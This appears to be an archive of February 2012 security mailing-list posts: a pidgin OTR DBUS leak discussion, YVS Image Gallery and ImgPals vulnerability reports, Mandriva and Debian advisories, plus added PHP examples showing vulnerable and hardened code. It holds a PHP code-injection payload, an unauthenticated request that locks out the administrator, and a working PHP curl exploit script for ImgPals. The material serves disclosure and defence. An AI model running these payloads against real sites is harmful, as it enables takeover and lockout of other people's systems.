Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote:
> On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
>> I think you didn't understand the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then users 2 to 10 can see user 1's pidgin conversation.
>
> This is not what the OP or CVE describe:
>
>> plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.
>
> Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue.

I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance). DBUS is on my list of things to probe, prod, and attack due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good at separating processes and sessions so that data does not commingle.

Jeff
Re: [oss-security] Case YVS Image Gallery
On Mon, Feb 27, 2012 at 09:31:52AM -0700, Kurt Seifried wrote:
> If you make a list of issues (e.g. XSS, CSRF, etc) with the code examples I can assign the various blocks of issues CVEs.

1. ./administration/install.php opens ../functions/db_connect.php and writes to file without input validation leading to PHP code injection with all variables if any contains for example:

;} ?><?php print("Hello World"); exit() ?>

Note that install guide in web says: after installation is complete, delete the install.php file and install.php does not need permissions.

2. ./administration/create_album.php does not have proper input validation leading to stored XSS, which can only be added by administrators, but I don't think of this as a limit after other vulnerabilities. XSS will also be shown to normal users (mainpage).

- Henri Salo
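The install.php issue Henri describes is a classic "installer writes request values into a PHP file" sink. The following is an added example, not YVS Image Gallery code: it reconstructs the vulnerable writer pattern and puts a hardened writer beside it. The variable names, the db_connect.php layout and the single-quoted config format are assumptions; because the exact quoting of Henri's payload was lost in transit, the demo prepends a single quote to match the assumed format.

```php
<?php
// Added example for the install.php code-injection report; not project code.
// build_db_connect_vulnerable() reconstructs the assumed pattern (installer
// concatenates request values into ../functions/db_connect.php);
// build_db_connect_safe() is a hardened replacement. All names are assumptions.

// Vulnerable writer: raw input becomes PHP source. A value such as
//   ';} ?><?php print("Hello World"); exit(); ?>
// closes the string literal and the PHP block, and the rest runs on every
// include of the generated file.
function build_db_connect_vulnerable(array $in): string
{
    $src = "<?php\n";
    foreach (['db_host', 'db_user', 'db_pass', 'db_name'] as $key) {
        $src .= '$' . $key . " = '" . ($in[$key] ?? '') . "';\n";
    }
    $src .= "mysql_connect(\$db_host, \$db_user, \$db_pass);\n";
    return $src;
}

// Hardened writer: allow-list each value, then emit it with var_export(),
// which yields a correctly escaped single-quoted literal, so quotes, braces
// and "?>" inside the value stay inside the string.
function build_db_connect_safe(array $in): string
{
    $rules = [
        'db_host' => '/\A[A-Za-z0-9.\-]{1,253}\z/',   // hostname or IPv4 only
        'db_user' => '/\A[A-Za-z0-9_]{1,32}\z/',
        'db_pass' => '/\A[\x20-\x7e]{0,128}\z/',      // printable ASCII, any punctuation
        'db_name' => '/\A[A-Za-z0-9_]{1,64}\z/',
    ];
    $src = "<?php\n";
    foreach ($rules as $key => $re) {
        $val = (string) ($in[$key] ?? '');
        if (!preg_match($re, $val)) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $src .= '$' . $key . ' = ' . var_export($val, true) . ";\n";
    }
    $src .= "mysql_connect(\$db_host, \$db_user, \$db_pass);\n";
    return $src;
}

// Count PHP open tags in the generated source with the real tokenizer.
// The intended config has exactly one; a successful injection adds a second.
function count_open_tags(string $src): int
{
    $n = 0;
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_OPEN_TAG) {
            $n++;
        }
    }
    return $n;
}

function demo(): array
{
    // Constructed input: the advisory's payload (with a leading quote for the
    // assumed single-quoted format) placed in db_pass, then in db_host.
    $payload = "';} ?><?php print(\"Hello World\"); exit(); ?>";
    $base = ['db_host' => 'localhost', 'db_user' => 'yvs',
             'db_pass' => 'secret',    'db_name' => 'gallery'];

    $vuln = build_db_connect_vulnerable(['db_pass' => $payload] + $base);
    $safe = build_db_connect_safe(['db_pass' => $payload] + $base);
    try {
        build_db_connect_safe(['db_host' => $payload] + $base);
        $hostResult = 'accepted';
    } catch (InvalidArgumentException $e) {
        $hostResult = 'rejected: ' . $e->getMessage();
    }
    return [
        'vulnerable_open_tags' => count_open_tags($vuln), // 2: injected code is live
        'safe_open_tags'       => count_open_tags($safe), // 1: payload stays a string
        'payload_in_db_host'   => $hostResult,            // rejected by the allow-list
    ];
}

print_r(demo());
```

Note that var_export() alone is what makes the password case safe; the allow-lists exist so that fields with a known shape (hostname, identifier) reject junk outright rather than relying on escaping. Deleting install.php after setup, as the install guide says, does not help if the generated db_connect.php already carries the injected code.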
Re: [Full-disclosure] pidgin OTR information leakage
On 02/27/2012 11:23 PM, devn...@vonage.com wrote:
> I believe that clarification is in order.

Indeed it is. The original post mentions a same-user attack vector which is very misleading as to what the real problem here is. And it boils down to this: Once a process sends private info over DBUS there is no way to control where this ends up (which apps are the qualified receivers) or what the receivers do with it.

So, if for example the user selects not to log OTR plaintext (so that this sensitive information doesn't touch the hard drive) another application on the other end of DBUS might choose to do something different (and not by malicious intent). There is no way to enforce the same security policy on the sender and the receivers.

How this could be exploited by attackers or what forensic evidence DBUS snooping leaves are of much less importance than the above privacy issue.

There is a very good discussion on the pidgin ticket page:
http://developer.pidgin.im/ticket/14830

Also, I've made some updates to our post, to make it clearer as to what this issue is about:
http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/

If there are still questions, I'll be happy to answer them.

Hope this clarifies things a bit,
Dimitris
Re: [Full-disclosure] pidgin OTR information leakage
On 02/28/2012 12:14 AM, Dimitris Glynos wrote:
> On 02/27/2012 11:23 PM, devn...@vonage.com wrote:
>> I believe that clarification is in order.
>
> Indeed it is. The original post mentions a same-user attack vector which is very misleading as to what the real problem here is. And it boils down to this: Once a process sends private info over DBUS there is no way to control where this ends up (which apps are the qualified receivers) or what the receivers do with it.

This should be:

Once a process *broadcasts* private info over DBUS there is no way to control where this ends up (which apps are the qualified receivers) or what the receivers do with it.

> So, if for example the user selects not to log OTR plaintext (so that this sensitive information doesn't touch the hard drive) another application on the other end of DBUS might choose to do something different (and not by malicious intent). There is no way to enforce the same security policy on the sender and the receivers.
>
> How this could be exploited by attackers or what forensic evidence DBUS snooping leaves are of much less importance than the above privacy issue.
>
> There is a very good discussion on the pidgin ticket page:
> http://developer.pidgin.im/ticket/14830
>
> Also, I've made some updates to our post, to make it clearer as to what this issue is about:
> http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/
>
> If there are still questions, I'll be happy to answer them.
>
> Hope this clarifies things a bit,
> Dimitris
[ MDVSA-2012:023-1 ] libvpx
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDVSA-2012:023-1
http://www.mandriva.com/security/
___

Package : libvpx
Date    : February 28, 2012
Affected: 2010.1, 2011.
___

Problem Description:

A vulnerability has been found and corrected in libvpx:

VP8 Codec SDK (libvpx) before 1.0.0 Duclair allows remote attackers to cause a denial of service (application crash) via (1) unspecified corrupt input or (2) by starting decoding from a P-frame, which triggers an out-of-bounds read, related to the clamping of motion vectors in SPLITMV blocks (CVE-2012-0823).

The updated packages have been patched to correct this issue.

Update:

This is a symbolic advisory correction because there was a clash with MDVSA-2012:023 that addressed libxml2.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0823
___

Updated Packages:

Mandriva Linux 2010.1:
80595bcf9605087872ef9e76988c06fb  2010.1/i586/libvpx0-0.9.7-0.2mdv2010.2.i586.rpm
6a39a655e52324d5454df93c54803e1d  2010.1/i586/libvpx-devel-0.9.7-0.2mdv2010.2.i586.rpm
36669f19119055daa1c65a4341bf00ee  2010.1/i586/libvpx-utils-0.9.7-0.2mdv2010.2.i586.rpm
efbc2e9f8338a146ed9bb4a8133ee3d0  2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm

Mandriva Linux 2010.1/X86_64:
7d42ba1449797b928a025d82fbbf2a65  2010.1/x86_64/lib64vpx0-0.9.7-0.2mdv2010.2.x86_64.rpm
05101dfd30ef938952f61705a1394705  2010.1/x86_64/lib64vpx-devel-0.9.7-0.2mdv2010.2.x86_64.rpm
20e10865900d2a24d58b7677098057e8  2010.1/x86_64/libvpx-utils-0.9.7-0.2mdv2010.2.x86_64.rpm
efbc2e9f8338a146ed9bb4a8133ee3d0  2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm

Mandriva Linux 2011:
e77c03974267d8b697fce1944dc7627b  2011/i586/libvpx0-0.9.7-0.2-mdv2011.0.i586.rpm
e52f1469cdf005a7a8e2855a65bfde2f  2011/i586/libvpx-devel-0.9.7-0.2-mdv2011.0.i586.rpm
6fbe1b807480c8c86d482cef51f5cc7d  2011/i586/libvpx-utils-0.9.7-0.2-mdv2011.0.i586.rpm
e274966b396ce1cb66aa4b01f2bea88e  2011/SRPMS/libvpx-0.9.7-0.2.src.rpm

Mandriva Linux 2011/X86_64:
81c2210c4f37421a22a877599304b5a4  2011/x86_64/lib64vpx0-0.9.7-0.2-mdv2011.0.x86_64.rpm
02f987fb0972c5b45a91a3d02060923f  2011/x86_64/lib64vpx-devel-0.9.7-0.2-mdv2011.0.x86_64.rpm
a7d46c97d8294236422b37a8359ba64d  2011/x86_64/libvpx-utils-0.9.7-0.2-mdv2011.0.x86_64.rpm
e274966b396ce1cb66aa4b01f2bea88e  2011/SRPMS/libvpx-0.9.7-0.2.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
___

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFPTL06mqjQ0CJFipgRAmSwAKC3SrXDSm5poitKzRLbK3HdV0s5XwCgqOwj
GCMzTwqDabkLHPmw9/sT7lk=
=XrZF
-----END PGP SIGNATURE-----
ImgPals Photo Host Version 1.0 Admin Account Disactivation
-=[ADVISORY---]=-
ImgPals Photo Host Version 1.0 STABLE
Author: Corrado Liotta Aka CorryL [corry...@gmail.com]
-=[---]=-
-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Deactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Description ]::..

(From the vendor's product description:)
I released the ImgPals Photo Host Version 1.0 STABLE
Features Include:
* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
  o Multiple JQuery Uploads
  o Create and Edit Photo Albums
  o Make Albums Public or Private
  o Describe Albums and Photos
  o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
  o Add Friends
  o Chat with Friends
  o Update people with status wall posting
  o Manage Profile
  o Profile Avatar Uploads
  o Private Messaging
* And much more, be sure to check out the Demo

...::[ Bug ]::..

An attacker can remotely disable the administrator's account, preventing the administrator from accessing the site. approve.php performs the account update without checking that the caller is logged in or is an administrator; the target id and the action are taken straight from the query string.

...::[ Proof Of Concept ]::..

if ($_GET['a'] == 'app0'){
    $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'");

By sending the request

approve.php?u=1&a=app0

an attacker can disable the Administrator account (member id 1).

...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
// Coded by Corrado Liotta For educational purpose only
// use php exploit.php server app0 or app1
// use app0 for admin account off
// use app1 for admin account on
$target = $argv[1];
$power  = $argv[2];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
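The approve.php snippet in the PoC shows two things at once: no authentication or authorization around a state-changing action, and $_GET['u'] concatenated straight into the UPDATE. The following is an added example, not ImgPals code and not a vendor patch: approve_vulnerable() reproduces the PoC logic, and approve_hardened() shows one way to fix it. The session layout ($session['user_id'], ['is_admin'], ['csrf']), the POST field names and the members table columns are assumptions; the demo runs against an in-memory SQLite table with constructed rows so it works offline.

```php
<?php
// Added example for the ImgPals approve.php advisory; not project code.
// approve_vulnerable() mirrors the PoC. approve_hardened() and the session
// fields it relies on are assumptions about a fix, not the vendor's patch.

// As in the PoC: no login check, no admin check, the victim id and the action
// come straight from the query string, and the id is concatenated into SQL.
function approve_vulnerable(array $get): string
{
    $val = (($get['a'] ?? '') === 'app0') ? '0' : '1';
    return "UPDATE members SET approved = '" . $val . "' WHERE id = '" . ($get['u'] ?? '') . "'";
}

// Hardened handler: returns [http_status, message].
function approve_hardened(string $method, array $session, array $post, PDO $db): array
{
    // State-changing action: POST only, and only for an authenticated admin.
    if ($method !== 'POST') {
        return [405, 'POST required'];
    }
    if (empty($session['user_id']) || empty($session['is_admin'])) {
        return [403, 'administrator login required'];
    }
    // Per-session CSRF token, compared in constant time.
    if (!isset($session['csrf'], $post['csrf'])
        || !hash_equals($session['csrf'], (string) $post['csrf'])) {
        return [403, 'invalid CSRF token'];
    }
    $action = $post['a'] ?? '';
    if (!in_array($action, ['app0', 'app1'], true)) {
        return [400, 'unknown action'];
    }
    // Strict integer validation replaces string concatenation.
    $id = filter_var($post['u'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, 'invalid member id'];
    }
    if ($id === (int) $session['user_id']) {
        return [400, 'refusing to change your own account'];
    }
    // Prepared statement; admin rows are excluded in the WHERE clause so this
    // endpoint can never lock an administrator out.
    $stmt = $db->prepare('UPDATE members SET approved = :v WHERE id = :id AND is_admin = 0');
    $stmt->execute([':v' => ($action === 'app1') ? 1 : 0, ':id' => $id]);
    return [200, 'rows updated: ' . $stmt->rowCount()];
}

// Offline demo on an in-memory SQLite table (constructed data).
function demo(): array
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, approved INTEGER NOT NULL, is_admin INTEGER NOT NULL)');
    $db->exec('INSERT INTO members VALUES (1, 1, 1), (2, 1, 0), (3, 0, 0)');

    $admin = ['user_id' => 1, 'is_admin' => 1, 'csrf' => bin2hex(random_bytes(16))];
    $out = [];
    $out['poc_sql']    = approve_vulnerable(['u' => '1', 'a' => 'app0']);     // what the PoC runs
    $out['anon_get']   = approve_hardened('GET', [], ['u' => '1', 'a' => 'app0'], $db);
    $out['no_csrf']    = approve_hardened('POST', $admin, ['u' => '2', 'a' => 'app0'], $db);
    $out['admin_self'] = approve_hardened('POST', $admin,
        ['u' => '1', 'a' => 'app0', 'csrf' => $admin['csrf']], $db);
    $out['legit']      = approve_hardened('POST', $admin,
        ['u' => '2', 'a' => 'app0', 'csrf' => $admin['csrf']], $db);
    $out['sqli']       = approve_hardened('POST', $admin,
        ['u' => "1' OR '1'='1", 'a' => 'app0', 'csrf' => $admin['csrf']], $db);
    $out['admin_still_approved'] = (int) $db->query('SELECT approved FROM members WHERE id = 1')->fetchColumn();
    $out['member2_approved']     = (int) $db->query('SELECT approved FROM members WHERE id = 2')->fetchColumn();
    return $out;
}

print_r(demo());
```

The unauthenticated GET that the exploit sends (approve.php?u=1&a=app0) is answered with 405 before any database work; the only call that changes a row is the authenticated, token-bearing POST against a non-admin member.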
[ MDVSA-2012:025 ] samba
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDVSA-2012:025
http://www.mandriva.com/security/
___

Package : samba
Date    : February 28, 2012
Affected: Enterprise Server 5.0
___

Problem Description:

A vulnerability has been found and corrected in samba:

Heap-based buffer overflow in process.c in smbd in Samba allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a Batched (aka AndX) request that triggers infinite recursion (CVE-2012-0870).

The updated packages have been patched to correct this issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0870
___

Updated Packages:

Mandriva Enterprise Server 5:
f1c5c40a39960bf0be8b4f7b0eb07f1c  mes5/i586/libnetapi0-3.3.12-0.8mdvmes5.2.i586.rpm
c09851ea48666122ce67fb3bb5d863b7  mes5/i586/libnetapi-devel-3.3.12-0.8mdvmes5.2.i586.rpm
574874125ee63e520110e73158fa1c53  mes5/i586/libsmbclient0-3.3.12-0.8mdvmes5.2.i586.rpm
ed39a5badbcb3dff984d099d995e4654  mes5/i586/libsmbclient0-devel-3.3.12-0.8mdvmes5.2.i586.rpm
37f6c8edc6af9e4439fe1cfa74162fd4  mes5/i586/libsmbclient0-static-devel-3.3.12-0.8mdvmes5.2.i586.rpm
e06527be75deb64802f8bfa4c266f9bc  mes5/i586/libsmbsharemodes0-3.3.12-0.8mdvmes5.2.i586.rpm
9926b5aa94649fe5e4563d7d30eea094  mes5/i586/libsmbsharemodes-devel-3.3.12-0.8mdvmes5.2.i586.rpm
13ed1d18924705829149f27c89cff483  mes5/i586/libtalloc1-3.3.12-0.8mdvmes5.2.i586.rpm
0dcc0cadaff5d3e9e9b26a4aa76320b9  mes5/i586/libtalloc-devel-3.3.12-0.8mdvmes5.2.i586.rpm
f66dc353d8f7cc28d9e9922bc731bd06  mes5/i586/libtdb1-3.3.12-0.8mdvmes5.2.i586.rpm
87689dca4f04ccc56c8b7e2958f870a5  mes5/i586/libtdb-devel-3.3.12-0.8mdvmes5.2.i586.rpm
eac4493389bdd505786b2a813800ec21  mes5/i586/libwbclient0-3.3.12-0.8mdvmes5.2.i586.rpm
0a4d9665399a405ec33352bac8b085d7  mes5/i586/libwbclient-devel-3.3.12-0.8mdvmes5.2.i586.rpm
31d01f8f5ac236bdeb5da6c0b1103c26  mes5/i586/mount-cifs-3.3.12-0.8mdvmes5.2.i586.rpm
4d65a41c7adf287f33146cb51976c12f  mes5/i586/nss_wins-3.3.12-0.8mdvmes5.2.i586.rpm
95851e4895bebace6a800c21411c2c98  mes5/i586/samba-client-3.3.12-0.8mdvmes5.2.i586.rpm
615ae2342634aa724e233fe7c38e1021  mes5/i586/samba-common-3.3.12-0.8mdvmes5.2.i586.rpm
593f4559e2e7927c3d2be07c75f69fc2  mes5/i586/samba-doc-3.3.12-0.8mdvmes5.2.i586.rpm
082b8b10f48f87102f5f4e5734192274  mes5/i586/samba-server-3.3.12-0.8mdvmes5.2.i586.rpm
671a8293f5c9970eff7f41a382ce1de8  mes5/i586/samba-swat-3.3.12-0.8mdvmes5.2.i586.rpm
d0826b2d50dd03a8a2def0ab8217a10b  mes5/i586/samba-winbind-3.3.12-0.8mdvmes5.2.i586.rpm
e63162eb725a3c786a9d6ce6e3ffa834  mes5/SRPMS/samba-3.3.12-0.8mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
08052ae7f504d3afebc2592c4563cb26  mes5/x86_64/lib64netapi0-3.3.12-0.8mdvmes5.2.x86_64.rpm
959b440b7a52de85774c7826c23e5a0d  mes5/x86_64/lib64netapi-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
4fbf3c6550bbd781101b19a5f59db31f  mes5/x86_64/lib64smbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm
fa0e52cf4f492cb5d991ca5305f4eca7  mes5/x86_64/lib64smbclient0-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
3aab55b5470b2dd3fe21bc22aac57881  mes5/x86_64/lib64smbclient0-static-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
62faaa06906b9b03f73d130c30841e24  mes5/x86_64/lib64smbsharemodes0-3.3.12-0.8mdvmes5.2.x86_64.rpm
2989b58fbd3b45bc9f59c252c694970f  mes5/x86_64/lib64smbsharemodes-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
7b02247f56fbae2c39148fbbdb2a9753  mes5/x86_64/lib64talloc1-3.3.12-0.8mdvmes5.2.x86_64.rpm
c06c34fbdf4472157ce75f438c8975fe  mes5/x86_64/lib64talloc-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
05412945bb2a1b2be22aab619395366e  mes5/x86_64/lib64tdb1-3.3.12-0.8mdvmes5.2.x86_64.rpm
a5d3e798398970a92129d182766049ab  mes5/x86_64/lib64tdb-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
fa4659a2d3591b354ed48fe4780e318a  mes5/x86_64/lib64wbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm
a647ebd6ed3d00f8e0cf32db8deddd89  mes5/x86_64/lib64wbclient-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
5075846b37b482eee78d1390284d221f  mes5/x86_64/mount-cifs-3.3.12-0.8mdvmes5.2.x86_64.rpm
08968a5c3682f2af4dab4433d3c4906c  mes5/x86_64/nss_wins-3.3.12-0.8mdvmes5.2.x86_64.rpm
1f391d0c654c0efa93a4a9b90ff8abad  mes5/x86_64/samba-client-3.3.12-0.8mdvmes5.2.x86_64.rpm
9d374a84dab147dd3a7e20f38032740f  mes5/x86_64/samba-common-3.3.12-0.8mdvmes5.2.x86_64.rpm
fbc801397a2f7b94b06397aed9e037a8  mes5/x86_64/samba-doc-3.3.12-0.8mdvmes5.2.x86_64.rpm
39fde58a25e8180b574cf6e5a8f7e432  mes5/x86_64/samba-server-3.3.12-0.8mdvmes5.2.x86_64.rpm
d9f108c12ade5b0f8905cb453cdb99dc
[SECURITY] [DSA 2420-1] openjdk-6 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2420-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
February 28, 2012                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-3377 CVE-2011-3563 CVE-2011-5035 CVE-2012-0497
                 CVE-2012-0501 CVE-2012-0502 CVE-2012-0503 CVE-2012-0505
                 CVE-2012-0506 CVE-2012-0507

Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform.

CVE-2011-3377

    The Iced Tea browser plugin included in the openjdk-6 package does not properly enforce the Same Origin Policy on web content served under a domain name which has a common suffix with the required domain name.

CVE-2011-3563

    The Java Sound component did not properly check for array boundaries. A malicious input or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine to crash or disclose a portion of its memory.

CVE-2011-5035

    The OpenJDK embedded web server did not guard against an excessive number of request parameters, leading to a denial of service vulnerability involving hash collisions.

CVE-2012-0497

    It was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer. This could lead to a JVM crash or Java sandbox bypass.

CVE-2012-0501

    The ZIP central directory parser used by java.util.zip.ZipFile entered an infinite recursion in native code when processing a crafted ZIP file, leading to a denial of service.

CVE-2012-0502

    A flaw was found in the AWT KeyboardFocusManager class that could allow untrusted Java applets to acquire keyboard focus and possibly steal sensitive information.

CVE-2012-0503

    The java.util.TimeZone.setDefault() method lacked a security manager invocation, allowing an untrusted Java application or applet to set a new default time zone.

CVE-2012-0505

    The Java serialization code leaked references to serialization exceptions, possibly leaking critical objects to untrusted code in Java applets and applications.

CVE-2012-0506

    It was discovered that the CORBA implementation in Java did not properly protect repository identifiers (that can be obtained using the _ids() method) on certain Corba objects. This could have been used to perform modification of data that should have been immutable.

CVE-2012-0507

    The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause the Java Virtual Machine to crash or bypass Java sandbox restrictions.

For the stable distribution (squeeze), these problems have been fixed in version 6b18-1.8.13-0+squeeze1.

For the testing distribution (wheezy) and the unstable distribution (sid), these problems have been fixed in version 6b24-1.11.1-1.

We recommend that you upgrade your openjdk-6 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJPTTmbAAoJEL97/wQC1SS+lqwH/1F5hffrk0ciMajdYvUuPgs5
tDeo+Sq6WwZqSYJFYsXDyyxtLProzR9Szi4n0O5942nUqRV6UtzxsvWPoQVm+gVF
c9waYDogwr7X6KNUdhLoWRwR0wZm5lryLPUNPx1AGJd0CstxJJ3cFX243m2F0+03
BuDU4QuwMliS5YpvEJ3JUFA4zZ3ETwa033poeOD9Pkh5Y8wfbaiYM6/0yvI/lIDC
EmszvApi8iM/Q6s5olvFgHpv+J2aiLR6IYmP8wWJLd2vvGpukoix06U/eqF0NirT
ilZaZmw1YGultG34yWP95TaF5+AOYgkm5g80SeHX2B3iL2u1cd1xklo6i2eGVBE=
=jUub
-----END PGP SIGNATURE-----